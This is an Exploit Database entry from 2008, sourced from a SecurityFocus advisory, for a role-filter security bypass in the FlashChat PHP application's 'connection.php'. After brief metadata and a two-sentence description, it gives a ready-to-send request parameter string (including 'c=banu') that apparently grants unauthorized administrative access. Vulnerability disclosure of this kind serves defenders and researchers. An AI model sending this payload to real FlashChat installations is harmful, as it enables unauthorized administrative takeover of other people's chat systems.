FlashChat - 'connection.php' Role Filter Security Bypass

EDB-ID:

32494


Author:

eLiSiA

Type:

webapps


Platform:

PHP

Date:

2008-10-17


source: https://www.securityfocus.com/bid/31800/info

FlashChat is prone to a security-bypass vulnerability.

An attacker can leverage this vulnerability to bypass certain security restrictions and gain unauthorized administrative access to the affected application. 

sendAndLoad=%5Btype%20Function%5D&s=7&t=&r=0&u=5581&b=3&c=banu&cid=1&id=